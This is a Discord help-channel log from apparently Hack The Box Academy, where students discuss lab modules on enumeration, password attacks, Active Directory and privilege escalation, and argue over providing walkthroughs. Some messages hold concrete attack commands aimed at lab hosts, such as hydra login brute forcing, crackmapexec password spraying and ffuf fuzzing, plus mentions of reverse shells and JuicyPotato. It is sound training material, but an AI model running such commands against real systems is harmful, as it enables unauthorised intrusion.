#modules

1 messages · Page 106 of 1

fathom pendant
#

For academy

tall saffron
#

What?

#

A pdf isnt doable due to their infra?

fathom pendant
#

How do you propose it being accessible after doing a skill assessment is the point

tall saffron
#

Even a video on YouTube xD

#

There is plenty of way with minimal web dev

fathom pendant
#

I'm not saying they can't do a file or video. But currently, how it's set up, it's not feasible on a large scale

#

Then dm a staff if you believe the solution to be that simple

tall saffron
#

Im curious on how it is not feasible to verify all good answer was answered on the skill assesment page ^^

fathom pendant
#

@west canopy

fathom pendant
#

And if you got the answer, it shouldn't matter if it's one of the ways it can be done

tall saffron
#

We pay for the module, it isnt like they sell a service

tall saffron
fathom pendant
tall saffron
#

Anyway, it isnt like we have the choice lmao

tawdry vapor
#

i haven't found it yet

dawn condor
#

Hi, I'm stuck on Nmap (Network Enumeration) firewall, IDS/IPS hard exercise, was able to find the X port, but can't seem to get the version. any pointers?

uneven dune
#

hello guys i have a question about this module

#

when i do the connection the banner that i recive is different of the real answer, i am doing something wrong or the right answer for the module is wrong ?

#

||```

  • the answer that i do when i connect with nc says XXXXX Debian-5+deb11u1
  • the answer expected to be submited is XXXXX Ubuntu-4ubuntu0.1
tall saffron
dawn condor
livid zephyr
#

Password attacks, Pass the ticket from linux. On the svc_workstation question, I got the flag.txt which seems to have 'Archive' attribute. How do I read it?, I google around and say, I shoud be able to use 'vi flag.txt' to see the inside for the flag. Which I did, but HTB says is wrong. I tried changing the extension to zip and tar but didn't work. If I do a 'cat flag', I get two unreadeable characters added to the flag. So what I am missing here?. Also, another question here, did you were able to get the password for svc_workstation? because with aes-256, I decided not to even tried cracking the password.

slate palm
livid zephyr
slate palm
#

looks right to me maybe you want to read the task again (especially the part in the brackets)

livid zephyr
barren apex
obtuse fiber
#

thanks a lott

thorn hawk
#

Hey people. I am doing the sqlmap module on the academy (note have finished the sql injection module). Just going through the first exercises. Is quite simple with the tool at hand hehe. My question is can i do the same result e.g. find the flag by including manual sql injections from POST request in Burp? Tyring to put the results given by sqlmap in the request and while i recieve info i dont see the info i want.

eternal zealot
#

Hello everyone! I am stuck in the skill assessment I of the AD module. I am trying to connect to MS01 machine, but I cant. The ping is received but I dont have a request with the Enter-PSSession command. Can anyone give my a hint? thanks so much

faint trellis
#

What dot does you mean?

acoustic owl
pine dagger
#

He is correct, the dot is important.

#

or if you prefer, the period.

wanton estuary
#

Does anyone know why ftps directories are empty when you login and do ls but if you use wget -m --no-passive ftp://name:password@ip:port it downloads files?

flat silo
#

I'm working on the file upload attacks module I've used msfvenom to set up my reverse shell I can use a web shell to see command output and I see the shell uploaded but when I try to visit the url [IP:PORT]/uploads/reverse.php to activate it I get /*

barren apex
#

do you have read access?

wanton estuary
#

Yes using the same user

tranquil axle
supple radish
#

Im on the hard assessment in the password attacks module and I got the administrator hash but no matter how i use it seems like its wrong. Can someone help me out?

faint trellis
# acoustic owl The dot in the message

I can't understand what message do you mean. I have the following messages in the server responses. Either "Log in failed with the given credentials." or "500 Internal Server Error" or "<b>Error</b>: Missing xxx parameter". Also "A password reset token was sent to your email address". Can you hint more ?

quiet ember
supple radish
quiet ember
#

once you crack the ||bitlocker|| hash you can just grab it from the vdi right?

zinc marsh
#

sorry is this relevant? I mean can I do something with this?

deep owl
#

hello all

#

AD Enumeration & Attacks - Skills Assessment Part II

#

one of the questions is solved by password spraying

supple radish
deep owl
#

please givve me tips on how to know what password to spray

deep owl
#

appreciate any help 🙂

supple radish
trail leaf
quiet ember
deep owl
supple radish
trail leaf
#

everything needed to do this is covered in the module

deep owl
#

this is the format of my user list "username@inlanefreight.local"

#

and am doing it via kerbrute

foggy jackal
#

were you able to get through this?

tawdry vapor
#

i'm in the footprint hard lab, i got the ssh private key through openssl s_client -connect IP:pop3s but when i try to connect ssh, this error apear Load key "id_rsa": error in libcrypto tom@10.129.57.90: Permission denied (publickey).

#

can anyone help me?¢

analog dock
#

Is there a proper app I can edit the .Java files from attacking thick applications in? I get a ton of errors when I try to do it with notepad

#

And I think it’s because of this shit

#

It doesn’t work when I try to edit the invoker.Java for downloading the fatty-server.jar, nor does it work with editing the user.java for the sql injection part

#

Help would be greatly appreciated

kind vessel
#

Hello I am at the second question of Unconstrained Delegation - Computers. I've done everything as shown in the course, I've also bruteforced the admin hash but I can't get to the Share. I also tried renewing the tickets and restarting the machines. Can you explain where I went wrong?

fickle vessel
tawdry vapor
#

can anyone help me with the hard lab of the footprint module?

acoustic owl
slate palm
analog dock
#

Or not add it when I input code snippets from the module

slate palm
#

neither they are just comments added by the disassembler

analog dock
sly tapir
#

oo..this splunk module is a morale killer haha..rough for sure

supple radish
analog dock
#

Role seems to be the issue, idk what’s wrong with it though

thorn urchin
#

the entire section is a straight rip from part of that box

sly tapir
#

oh damn..i just noticed you got your CPTS madfox...grats dude...i took a break to do some blue team stuff...back at it now

zinc marsh
#

@thorn urchin with ligolo using responder if I use the tun0 interface it intercepts the ligolo interface as well?

thorn urchin
#

I dont know

#

I think it doesnt

#

but I havnt tested thoroughly enough

zinc marsh
#

k

trail leaf
#

Probably not considering LLMNR poisoning wouldn't work over a VPN. The only way I could see responder working over ligolo is setting up something like socat to redirect traffic, but at that point it's really no different than how you would try to do it on something like proxychains

#

There's a reason tools like Inveigh exist, so you can just run your listener from within the subnet instead of doing weird networking gymnastics

analog dock
thorn urchin
trail leaf
#

but the redirection isn't really part of the tuntap setup afaik, pretty sure it's just additional stuff baked into the agent

near thicket
#

yow mates

#

I'm stuck at bash scriptin

thorn urchin
#

I dunno, ligolo does some weird stuff most similar tools dont do and the docs only cover the bare basic usage. It def warrants some experimentation

near thicket
#

I do know programming but I think I made a dumb error and I can't find it

trail leaf
#

Source code is actually very interesting (and makes me want to try and rewrite in Rust) but it looks like, outside of the "gvisor userland network stack" magic, the redirection things is just basic network i/o

#

only skimmed code for like 5 mins though

mortal shadow
#

sudo hydra -L /opt/useful/SecLists/Usernames/top-usernames-shortlist.txt -P /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou-10.txt -f 10.129.149.43 -s 8080 http-post-form "/j_spring_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in:F=<form name='login'"
neither does this work:
sudo hydra -L /opt/useful/SecLists/Usernames/top-usernames-shortlist.txt -P /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou-10.txt -f 10.129.149.43 -s 8080 http-post-form "/j_spring_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in:Invalid username or password"

#

root:password is correct, but hydra doesn't detect it

civic zenith
#

Im on Attacking Active Directory & NTDS.dit . I must "submit John Marston's credentials as the answer. (Format: username:password, Case-Sensitive) " Bruteforcing rn with this command: crackmapexec smb 10.129.202.85 -u JMarston -p /home/legomyego/Downloads/rockyou.txt | grep -v "N_FAILURE"

#

Should I use a different password list?

#

I'd be more patient, but I keep having to reset the target machine due to connection issues

hazy minnow
#

ATTACKING ENTERPRISE NETWORKS | Port Forwarding Issue

I have used sshuttle and ligolo-ng successfully in Dante and also Zephyr. But for this environment, nothing beyond the jump box of 10.129.x.x can reach back to my attack machine. I can evil-winrm to 172.16.x.x devices only because of sshuttle, but setting up ligolo after that doesn't seem to be working. Anyone have any insight into this or experienced similar?

thorn urchin
#

gotta route back to the jump host to reach your machine

hazy minnow
#

yea I've been using that as a staging for tools, but trying to ssh to the inner domain from my attack box is a no go because of this

thorn urchin
#

ssh is a forward connection, shouldnt matter

#

unless youre doing some reverse ssh port forwarding stuff

sly tapir
#

can anyone throw me a hint on the Splunk Module, first lesson/last question "which account had the most 4624's within a 10minute time span"

hazy minnow
#

nah nothing like that

thorn urchin
#

then sounds like you have a different issue

#

if you have a successful tunnel in, then ssh will work

civic zenith
#

nvm I got it

raw forum
#

Hi guys, I'm on Windows Fundamentals module and I'm having problems with the "smbclient" command in bash, it outputs me the next error:

do_connect: Connection to (target IP) failed (Error NT_STATUS_IO_TIMEOUT)

Which is pretty weird since I used xfreerdp with the same target IP and it connects perfectly, I even configured the SMB permissions in the target, the module tells me this is the output that should print on the screen:

GreyWolf7@htb[/htb]$ smbclient -L IPaddressOfTarget -U htb-student
Enter WORKGROUP\htb-student's password:

Sharename       Type      Comment
---------       ----      -------
ADMIN$          Disk      Remote Admin
C$              Disk      Default share
Company Data    Disk      
IPC$            IPC       Remote IPC
fathom pendant
#

smbclient -L lists the fileshares then disconnects

fathom pendant
raw forum
#

This is the command: "smbclient -L IPaddressOfTarget -U htb-student"

#

And it is weird for me that the module shows me the "-L" parameter that is supossed for Listing and then puts an placeholder for an ip

fathom pendant
#

The -L just stands for LIST

#

When you do -L it does not matter anything else you do, it will list available shares, then immediately disconnect

strange pawn
#

any chance someone could help me out with the HARD footprinting lab ? I have got the ssh connection under tom, but I am having issues trying to escalate priveleges

thorn urchin
supple radish
# thorn urchin did you crack it?

I tried with hashcat and using mutated password list and it said cracked but where it’s supposed to say the password it’s just blank so it’s like hash:blank

thorn urchin
#

refresh my memory, was this an ntlm hash by any chance?

supple radish
#

Yes u get the sam database from the backup and it has a administrator ntlm hash

thorn urchin
#

gotcha, then that means you tried cracking the wrong hash

#

format is generally Admin:RID:hash:hash:stuff

you want the second hash

raw forum
thorn urchin
#

ive never opened up that file in my life

#

use the explicitly provided credentials when they say to use em

tawdry vapor
#

anyone knows how solve this problem? Load key "id_rsa": error in libcrypto
tom@IP: Permission denied (publickey).

#

is in the footprint hard lab

thorn urchin
tawdry vapor
#

yeah

#

chmod 600

fathom pendant
supple radish
wheat garden
#

Any one try to use eyewitness software recently? Is used in early sections of the Attacking common applications module. Fresh install of the most latest version I cannot get that software to run at all as far as taking screenshots seems like its broken. May just not like my computer though. Seeing if anyone else had issues if you happen to use it.

supple radish
tawdry vapor
#

anyone help me? i'm stuck with this module for 3 hours

wheat garden
fathom pendant
white lantern
fathom pendant
#

Does it give a reason?

#

Also encase the password in single quotes

tight mesa
#

hello guys, whom can I send a DM regarding Password Attacks module | Credential Hunting in Linux section

#

cuz, asking directly from here maybe I can be spoiling...

rustic sage
#

Identify if its possible to perform a zone transfer and submit the TXT record as the answer. (Format: HTB{...))

can someone give me the answer to this lol

i been stuck on it for months and just wanna move on and get a cube to be honest

proud pine
rustic sage
#

i have moved on

#

but i wanna get a cube

#

and finish the path properly

rustic sage
rustic sage
rustic sage
#

DNS'

rustic sage
#

its ok. i havent got time rn to be honest. thanks for the offer though. i'll be back soon

quiet ember
supple radish
quiet ember
fathom pendant
#

Is ssh even open?

fathom pendant
#

So are you running ssh from the remote machine?

graceful mortar
#

Hello friends

rustic sage
#

I'm confused, My target is 94.237.49.11:38623. My task is to grab the banner, so I do netcat 94.237.49.11 22
output is SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u1 but answer is SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.1 what am i doing wrong

thorn urchin
rustic sage
#

nvm i figured it out

thorn urchin
#

instead you grabbed the banner of a different port on the host

rustic sage
#

needed to scan provided prot

#

port

acoustic owl
#

Take another close look at the txt file you found on the way here. Which service runs on port 80 and which service runs on port 443?

acoustic owl
#

And then you just delete your posts? Okay, you can do that.
But then, unfortunately, it doesn't help any other students.

proud pine
#

More likely a mod lol

quiet ember
trail leaf
#

the hardest part of the footprinting module was the easy skill assessment because I kept misspelling the user's name kek

trail leaf
#

genuinely spent about 30-60 mins thinking the username was ciel instead of ceil

fathom pendant
#

Also fun fact; you're doing the nerfed version of the easy lab

#

Previously you had to either: use hint, or bruteforce

trail leaf
#

ew

#

footprinting

#

I'm basically doing the CPTS path in reverse kek

#

I've been solving boxes and CTF-ing for a few years now, I'm mostly doing stuff to find holes in my knowledge

#

so I did Active Directory, Windows Privilege Escalation, and Pivoting first because I knew I wasn't as good as I should be with those

#

good luck o7

rustic sage
#

my hint is that bob likes to use weak passwords. I still can't get it

cosmic charm
#

Hello everyone, on the Windows Privilege Escalation Skills Assessment - Part I, when trying privesc with juicy, I receive a "[+] CreateProcessWithTokenW OK" but no reverse shell. I have brute force all clsid but still not working. Can someone help me pls ?

full echo
#

Have you found the solution yet?

civic dawn
#

does anybody know if its possible to reset a modules progress in academy?

civic dawn
rustic sage
#

Hello everyone, im in ACTIVE DIRECTORY ENUMERATION & ATTACKS in privileged access module im trying to execute this query in bloodhound MATCH p1=shortestPath((u1:User)-[r1:MemberOf*1..]->(g1:Group)) MATCH p2=(u1)-[:CanPSRemote*1..]->(c:Computer) RETURN p2 but this return me NO DATA RETURNED FROM THE QUERY, what im doing wrong?

warm quiver
#

Did you manage to get the answer? I've been stuck on that one for a while

frozen mesa
#

INFORMATION GATHERING - WEB EDITION --> Active Subdomain Enumeration -->Submit the number of all "A" records from all zones as the answer.

Anyone that can give me a hint?

acoustic owl
#

Find all zones and count all A Records. I can't give much more hints than that.

frozen mesa
#

Little change in text but clear now. Thanks 🙂

acoustic owl
#

Did you write entries in the log file so that the file is rotated?

#

There are also log files that do not concern the web server 😉

cedar void
#

I am having trouble with question 3 of this module(https://academy.hackthebox.com/module/22/section/342) and not sure what to look for:
"Find the name of an account with a ServicePrincipalName set that is also a member of the Protected Users group. "

$protectedUsersGroupName = 'Protected Users'

Find the account with an SPN set and is a member of the Protected Users group

$account = Get-ADUser -Filter "ServicePrincipalName -like '*'" -Properties SamAccountName, ServicePrincipalName |
Where-Object { $.ServicePrincipalName -ne $null -and
(Get-ADGroupMember -Identity $protectedUsersGroupName -Recursive |
Where-Object { $
.SamAccountName -eq $_.SamAccountName }) }"

summer lava
#

Hey guys.. what's up

#

quick question pls

#

how do i clear bloodhound so to feed new data to it

#

Oh! just found it ..

cosmic charm
fiery berry
distant ibex
#

Hello everyone

timber beacon
warm quiver
timber beacon
tall saffron
stable wedge
#

Do I need to use grep command if i need to identify fqdn of the host where the last octet ends with x.x.x.203? Im on footprinting > dns module. Im stuck to this last question.
Im currently brute forcing it to find subdomains

forest zenith
#

Im still on Attacking Kerberos Module on the part of RBCD from windows, for some reason when I use the included PowerView.ps1 script that comes with the machine, Im unable to perform the exploit

#

But when I use another version downloaded from my kali, I can do it

vital adder
vital adder
plain coral
cosmic charm
dusty citrus
#

Guy's, I'm looking for a job opportunity in Cybersecurity related roles can anyone refer me?🙂

stable wedge
stable wedge
brittle berry
#

yo - https://academy.hackthebox.com/module/51/section/480 I chose to make it more challenging and found a foothold on how to get a shell, but whenever I try to login to the webpage, I'm loging in and then I'm logout after 5 sec or so, is that normal behaviour? I eventually get shell as www-data but my session keep disconnecting. Same if I decide to use the ssh credentials provided, i keep getting disconnected from my session.. So is the machine bugging out on me or this is intenional ? Reseting the machine doesn't seems to help.

vital adder
#

if you have both the pwnbox and your vpn on at the same time then that could be the issue no this isn't intended

brittle berry
summer lava
#

pls, can i get a quick help on ATTACKING ENTERPRISE NETWORKS ==> Lateral Movement

#

can't tell why mimikatz prints ERROR

misty current
#

I don't think that PowerShell console is open as Administrator.

summer lava
#

can't open the powershell as Administrator

misty current
#

A sign out and sign in should reflect the changes and allow you to open it as Administrator irc

#

Can you try that?

summer lava
#

how ?

#

i'm on remote session

#

yeah got it

#

Oh! yeah.. that worked so find

#

thanks bro

vivid igloo
#

cmd /c
STDOUT:

C:\inetpub\wwwroot\status.inlanefreight.local\files\demo.aspx
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Temporary ASP.NET Files\root\4308d536\e65a892\demo.aspx.8a26be37.compiled
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Temporary ASP.NET Files\root\e22c2559\92c7e946\demo.aspx.e75de2f5.compiled

#

Error
Incorrect answer! ?

#

q :Where is the Laudanum aspx web shell located on Pwnbox? Submit the full path. (Format: /path/to/laudanum/aspx)

#

mod:SHELLS & PAYLOADS

#

cont:Laudanum, One Webshell to Rule Them All

acoustic owl
zinc marsh
#

Someone know how to spawn a reverse shell as administrator if I am in the administrators group?

#

I only have access to winrm

acoustic owl
slate palm
#

I have a dumb question on the first footprint lab: is it supposed to be blind or did I just do it wrong?

tight mesa
#

hello everyone, for those who made the Password Attack Module/Credential Hunting in Linux, how could you ran the crypto tool?

#

cuz, the tool need Python3.9 to work properly but the version running in the machine is 3.8

slate palm
quiet ember
cinder cobalt
#

Hi, would anyone be free to answer a short question on subdomain Enum ?

tight mesa
#

@cinder cobalt shoot to see if can I help....

little creek
#

Greetings, is there anyone who uses a laptop with a portable monitor? I'd love to hear your feedback and advice.

trail leaf
#

Brute forcing is on the table still

#

A lot of the Windows boxes in Academy are still vulnerable to PrintNightmare and other exploits, so it makes sense

#

wait, they also give you credentials for that one

#

yeah there's zero brute forcing on that one

cinder cobalt
#

Hi, would anyone be free to answer a short question on subdomain Enum ? (turns out p4 is unavailable rn)

#

just having an issue with the subdomain enum part of "information gathering" web edition

sand cedar
#

yoo im stuck again on Attacking Common Services: Skill Assessment - Hard.

I'm fairly sure I'm right at the end. I just have an issue finding the right syntax.

acoustic owl
sand cedar
#

alright.

dire sage
#

ffuf -w /home/kali/ids.txt:FUZZ -u http://admin.academy.htb:47612/admin/admin.php -X POST -d 'id=FUZZ' -H 'Content-Type: applications/x-www-form-urlencoded' -fs 798 why isn't this command working?

#

the port is right

#

and the ip is already in /etc/hosts

iron plaza
#

I am having a bit of difficult wrapping my head around the*** stack alignment*** for ***printf ***function to work in assembly ... I would appreciate if someone could explain this to me. Thanks in advance

tulip dragon
#

Try to Analyze the deobfuscated JavaScript code, and understand its main functionality. Once you do, try to replicate what it's doing to get a secret key. What is the key? i am stuck here

tulip dragon
#

JAVASCRIPT DEOBFUSCATION page 10 (skill assessment )

dire sage
iron plaza
tight mesa
#

anyone who has made Password Attack Module/Credential Hunting in Linux....

tight mesa
acoustic owl
#

sure

tight mesa
#

gime some minutes

#

give me...

acoustic owl
#

No stress.
You can also ask the question here.
I just wanted to show you with the badge how many people have completed the module to answer your question.

tulip dragon
dire sage
#

idk if i can write this here but i invited a friend to the htb , he completed the module of the introduction but i still didnt receive any cubes

proud pine
dire sage
#

What do you guys think it's more worth the cubes? Network enumeration with nmap or Shells & Payloads

tight mesa
#

Ok., Houston I'm stuck, how suppose can run decrypt tool Password Attack Module/Credential Hunting in Linux.... IF python3.9 & python2 are not installed in the victim machine?

trail leaf
#

Depends on what you feel more or less comfortable with. Tbh I'd go for a different module altogether because I think those two are just okay, but it's really up to your needs at the end of the day.

dire sage
west canopy
#

We do not make writeups or official solution guides publicly available for Academy because 1) they could end up being distributed 2) we prefer having a community based support system.

trail leaf
lethal atlas
#

Whaat up @west canopy

trail leaf
#

However, I think my favorite modules have been the privilege escalation ones, active directory enumeration and attacks, pivoting, and the attacking enterprise networks ones

dire sage
trail leaf
#

mainly because those were areas I was weakest in and needed to do some refining, but I also think the lab offerings in those modules are probably some of the best on the platform for how much they cost

tranquil axle
#

There are some really good ones and others sometimes fall flat it feels

#

IDS IPS Evasion might just be using NULL/FIN/XMAS scan

rare topaz
#

lab offerings are more useful imo, sadly in my country it's laggy w 300 ping 💀

west canopy
#

yes it's a double edged sword. Writeups definitely have their place, and we don't want students to be stuck forever on a single problem. But I think at least on the Academy side, there are quite a few avenues for students to find support.

rare topaz
#

some academy content itself you can just google or learn elsewhere for free

lethal atlas
#

password attacks was tough but not due to content, it was waiting for the machine to crack the hashes.

dire sage
trail leaf
#

I guess the community aspect covers most of that though

lethal atlas
#

@trail leaf I am sure there are those of us that would not mind comparing notes.

trail leaf
#

yeah, I was mostly just thinking out loud

west canopy
#

When I was playing through the CBBH/CPTS modules i tried to document how I solved every problem . And then I would talk to other students and see how they solved it, if it was a different way I would document it and add it to my notes

tall saffron
#

And that's a user problem, the guy bought the module for nothing and will failed his exams... When the missing walkthrough is a problem for the others students who want to verify if he really understood the way he must solves the assesment

autumn pilot
#

In most of the cases exercises are solely based on what you've been taught in the section

#

Of course, there is the note to not expect everything to be put on the platter for you to copy and paste

quiet ember
autumn pilot
#

You are studying for a pen tester role, and for a type writer

fathom pendant
#

At the same time, you can respawn and repeat skill assessments

tall saffron
autumn pilot
#

Building the thought process is crucial

west canopy
tall saffron
autumn pilot
fathom pendant
#

If you have a shortcut then that means you understand it a bit more than what's taught

west canopy
tall saffron
trail leaf
#

that's not how buying things works

autumn pilot
#

You can use the support

fathom pendant
#

I.e. for months the (old) footprinting - easy lab people didn't know how to get the credentials, and had to use the hint. I eventually figured it out. I assume the change was due to not being taught certain tools on the module

#

But asking here isn't like you're truly bothering anyone, unless you're spamming or pinging random people

autumn pilot
tall saffron
fathom pendant
#

Then message support

#

And inform them

tall saffron
#

OMG i give up with you lmao

fathom pendant
#

If it's an actual issue

#

Like if it's a shortcut that can be worked around to remove it, the lab will be changed

tall saffron
#

You cant removed it lmao

fathom pendant
#

That's just the unfortunate nature of AD

#

¯_(ツ)_/¯

tall saffron
#

How you will removed it

slate palm
#

lol finest blue chat

tall saffron
#

Yeah that's why a walkthrough is needed for the AD at least

west canopy
fathom pendant
#

Or, you can do both. The shortcut. And the "intended" way using what's taught

tall saffron
#

But how the guy know it is a shortcut xD

#

If the guy took the module he doesnt know that

trail leaf
tall saffron
#

I know that because i make AD pentest htb make it mandatory to pass the cert

fathom pendant
slate palm
#

let ceil alone!

fathom pendant
#

I honestly didn't get it until after pass attacks and realizing, "there's a tool for that"™️

thorn urchin
west canopy
thorn urchin
#

You gunna go to client, get stuck, and ask em for a walkthrough on hacking their systems?

fathom pendant
#

If you know a more efficient way, then you know it more

tall saffron
fathom pendant
trail leaf
#

oh true I forgot it did that

tall saffron
west canopy
fathom pendant
thorn urchin
#

I dont believe I did

slate palm
#

so now that we have someone who actually knows: is ceils ftp supposed to be blind?

zinc marsh
tight mesa
#

hey people for Password Attack Module/Credential Hunting in Linux did you use laZagne or firefox_decrypt?

tall saffron
zinc marsh
#

it makes no sense having a walkthrough for the skill assessments

thorn urchin
tall saffron
slate palm
trail leaf
#

you are definitely able to list files

thorn urchin
#

It still feels unnecessary however. Labs with unintended paths are extremely rare.

slate palm
#

interesting when I did it I always got an empty listing

#

I will try to reproduce it - Im stuck on hard now anyways 😄

quiet ember
slate palm
#

ls -al isnt a supported ftp command right?

quiet ember
#

Works for me, just tried it right now

slate palm
#

oops

tall saffron
#

I dont cry lmao im not even concerned by it like the AD module, i do AD pentest daily but for a learning experience and after talking to the teens i have in the local "hacker" association, they have doubt they really solves it like they must did so they are still unsure about their knowledge

slate palm
#

maybe I should become a street sweeper instead

quiet ember
#

I got stuck on the hidden folders too lol

fathom pendant
fathom pendant
thorn urchin
#

Honestly its the first Ive even heard of the AD module having an unintended path for the skill assessments

tight mesa
fathom pendant
tall saffron
tight mesa
tight mesa
fathom pendant
tight mesa
#

yep

fathom pendant
#

Try downloading an older version

#

And transferring

tight mesa
#

I did already and python2 is not installed in the victim machine

fathom pendant
#

Can you not download a python3.8 version?

pliant flower
#

I was trying to use Bank retired machine from the 9 free boxes that were supposed to be free for a month. but I couldn't access today

tall saffron
thorn urchin
fathom pendant
tight mesa
tall saffron
fathom pendant
thorn urchin
#

Okay and?

#

Its excellent theyre trying to learn things at a young age!

tall saffron
#

They have a passion and we are here to animate it and guide them

thorn urchin
#

Okay cool

zinc marsh
fathom pendant
#

As of 1.0.0 it requires 3.9

thorn urchin
#

but how is that relevant to the course?

tall saffron
#

So you cant Ask them thé dedication an adult or older put in this passion

fathom pendant
#

¯_(ツ)_/¯

thorn urchin
#

Honestly yeah

tall saffron
#

Yeah again you ask students to make things people paid for

fathom pendant
#

Gives practice for the exam in the process

tall saffron
#

Like the support here

fathom pendant
#

You pay for the module, not support

zinc marsh
thorn urchin
#

I don't understand getting so upset at wanting the entire structure of the course to be changed to accommodate just your group on one module you have a complaint about

zinc marsh
#

to share it with ur students

tall saffron
fathom pendant
#

No

thorn urchin
#

No

languid dawn
thorn urchin
#

only one paid tier gets support

rare topaz
#

well akshually with silver annual, you pay for suppurt

fathom pendant
#

Support here is entirely voluntary

rare topaz
#

🤓

tall saffron
thorn urchin
#

and that doesnt mean you get walkthroughs, it means a staff member helps you out

fathom pendant
rare topaz
languid dawn
#

this is a community channel for community help on Academy please stay on topic

thorn urchin
tall saffron
#

Yeah free support from a company who sell courses and just have millions in invsetors lmao

thorn urchin
#

If you think I misunderstood, try explaining again.

languid dawn
#

support from htb is only on the website through the support chat/tickets

#

discord is for the community

zinc marsh
thorn urchin
zinc marsh
#

He cannot use this as support?

thorn urchin
#

which does redirect to getting help from staff on discord

#

but thats it

#

no entitlement to walkthroughs

rare topaz
#

guided mode is for retired boxes i believe

zinc marsh
#

I always used that when I had any problem with the platform

rare topaz
#

oh you mean the support chat?

tall saffron
zinc marsh
zinc marsh
tall saffron
#

Every people try to take the convo without even knowing what the convo was about lmao

thorn urchin
#

@tall saffron End of the day is that staff have seen your request about adding walkthroughs at end of modules. Most of us here disagree with that. Thats that.

zinc marsh
#

once because I couldn't turn off a machine some months ago and they solved it in 10 minutes

thorn urchin
#

And youre getting way too hostile about it to other people

fathom pendant
#
  • you want a walk through that's available after you complete the skill assessment
  • its a moot point
tall saffron
#

Lmao

autumn pilot
#

The whole point with academy is to teach you methodologies and develop your problem solving skills, there are labs you can practice whatever you want

thorn urchin
#

People are allowed to disagree with your opinion and suggestion.

zinc marsh
#

and the other one for the coupon of the season 1

tall saffron
#

So before i cry now im hostile xD

autumn pilot
#

If you have solved it in another way, good for you.

fathom pendant
thorn urchin
autumn pilot
#

The following mathematical problem 2+2=4 can be solved in many different ways, but does that mean they are wrong?

tall saffron
#

Cool

thorn urchin
#

Youre getting way too upset at people not agreeing with you.

#

Its not even a bad suggestion, I just dont agree with it.

tall saffron
zinc marsh
#

but doing a write-up for you students of the skill assessment takes you 30 minutes

fathom pendant
#

^

thorn urchin
tall saffron
#

If you didnt understood read it again 😉

thorn urchin
tight mesa
# fathom pendant I read the first line "as of 1.0.0 python 3.9 is required

I downloaded the version shared by you, zipped/uploaded/unzipped ran it, and this is the exact error that I'm having :

kira@nix01:~/firefox_decrypt$ ./firefox_decrypt.py 
Traceback (most recent call last):
  File "./firefox_decrypt.py", line 46, in <module>
    PWStore = list[dict[str, str]]
TypeError: 'type' object is not subscriptable
kira@nix01:~/firefox_decrypt$ ```

I downloaded the version shared by you, zipped/uploaded/unzipped ran it,
tall saffron
#

Weird i never received complaints and talk english with people daily so Ask questions about yourself

thorn urchin
#

Well Im actually a native speaker and had an English major so...

languid dawn
#

ok take it to DMs before I mute you both

fathom pendant
thorn urchin
#

I'm trying to work with ya here and youre being an ass about it

tall saffron
#

He is so emotive that he needs to talk about my english

fathom pendant
tall saffron
#

Since the subject was debated... Have a good day/night free workers

fathom pendant
#

emotive emotional

fathom pendant
thorn urchin
#

Good night

tall saffron
thorn urchin
#

and good luck on your CPTS journey 👍

tall saffron
#

It will not be a problem with all the previous cert 😉

zinc marsh
#

the workers are in the main platform

thorn urchin
fathom pendant
# fathom pendant <@183577914657210369> https://github.com/unode/firefox_decrypt

@west canopy @autumn pilot hey things may be broken if people are installing newer versions of Firefox decrypt as it now requires python >=3.9, and the old version they link requires python 2.x, which isn't installed on target. Pass ATTACK- credential hunting in Linux. Can you verify? (Firefox decrypt version >=1.0.0

tight mesa
#

thanks @fathom pendant

paper basalt
acoustic owl
livid quest
#

any tips on the hard nmap-lab?

cosmic charm
#

Hi can't undestand why in windows privesc assessment 1 I get juicypotato working on the target but no reverse shell... Could someon help please ?
I get the good message on the target :
Testing {8F5DF053-3013-4dd8-B5F4-88214E81C0CF} 1337
......
[+] authresult 0
{8F5DF053-3013-4dd8-B5F4-88214E81C0CF};NT AUTHORITY\SYSTEM

[+] CreateProcessWithTokenW OK

rustic sage
cosmic charm
#

how ?

rustic sage
civic zenith
#

Im on "Password Attacks - Credential Hunting in Linux." The question is: Examine the target and find out the password of the user Will. Then, submit the password as the answer. Following the hint's advice(at least I think), I have added kira's password to the password.list file given to us in the resources . Then I did: hashcat --force password.list -r custom.rule --stdout | sort -u > mut_pass.list Finally I run the bruteforcer: hydra -l kira -P mut_pass.list ftp://10.129.202.64 -t 48

#

To those who have passed this challenge, have I made any mistakes?

fringe shell
civic zenith
#

@fringe shell thx I knew something was wrong lmao found it

rustic sage
#

how i can solve this

west canopy
fathom pendant
rustic sage
fathom pendant
#

There's an option in curl I believe, the page should tell you what you need, make sure you read the section carefully

fathom pendant
#

I am not at my computer to assist further

trail depot
#

I remember this one, I struggled a bit
There’s a lot of different solutions probably, but I used ||grep||

fathom pendant
#

Googling I did find an htb forum post about it too

trail depot
#

Yeah I looked at my solution command I kept and I used grep with regex

thorn urchin
#

who said the user in question would have a home folder on the box?

thorn urchin
#

typically a user does, but they dont necessarily have to have one

#

even more mind-blowing: there can be a home folder present for a user that doesnt exist!

#

so lesson is dont trust home folders to translate 1to1 users on a box

rustic sage
#

Currently working on the last two questions of the "AD Enumeration & Attacks - Skills Assessment Part II" module. I've cracked the C**** user's password and am trying to figure out how to access the DC. Can someone give me a nudge?

forest grotto
#

What is the 2021 OWASP Top 10 classification for this vulnerability?

#

i couldnt ss from my VM even tho i did it with windows shift s but anyways could some answer that question for me.

turbid tide
#

Anybody know what was the number one OWASP web vulnerabilities in 2021?

elfin cedar
#

😭

#

I cant take it anymore!

#

Service start timed out, OK if running a command or non-service executable

supple radish
#

Can someone hint to what wordlists im supposed to use for the attacking common services easy on the S*** service, I have tried both the user and pass wordlist included in the resources and now have tried another like 6 wordlists in the /wordlists folder

#

your right ahead of me, you trying to help me out while you wait for your help

#

wdym stream it?

thorn urchin
#

honestly dont even worry about the question, focus on trying to escalate first and fill in the questions later

elfin cedar
#

nothing works

#

TypeError leaking initial Frag size, is the target patched?
[*] Exploit completed, but no session was created.

#

the module says to use a certain exploit but the target is not vulnerable to it... I swear half the time its because of some weird issue like this

#

its rigged 😭

tidal mango
elfin cedar
# tidal mango which question are you on?

